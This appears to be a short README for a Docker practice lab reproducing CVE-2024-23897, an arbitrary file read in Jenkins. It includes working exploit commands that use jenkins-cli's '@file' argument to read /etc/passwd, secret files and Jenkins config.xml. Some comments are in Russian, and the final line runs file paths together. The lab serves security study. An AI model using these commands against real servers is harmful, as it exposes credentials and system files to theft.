
Dockerベースのラボ環境:CVE-2024-23897 Jenkinsの任意ファイル読み取りエクスプロイトを練習するための、自動化された攻撃スクリプトと手動攻撃スクリプトを備えた環境。
Jenkins 2.441 以前における任意ファイル読み取りの脆弱性。
docker-compose up -d
docker exec -it attacker-host ./auto-exploit.sh
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar
# Первая строка файла
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"
# Полный файл
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"
/etc/passwd/opt/test-files/secret.txt/var/jenkins_home/config.xmldocker-compose down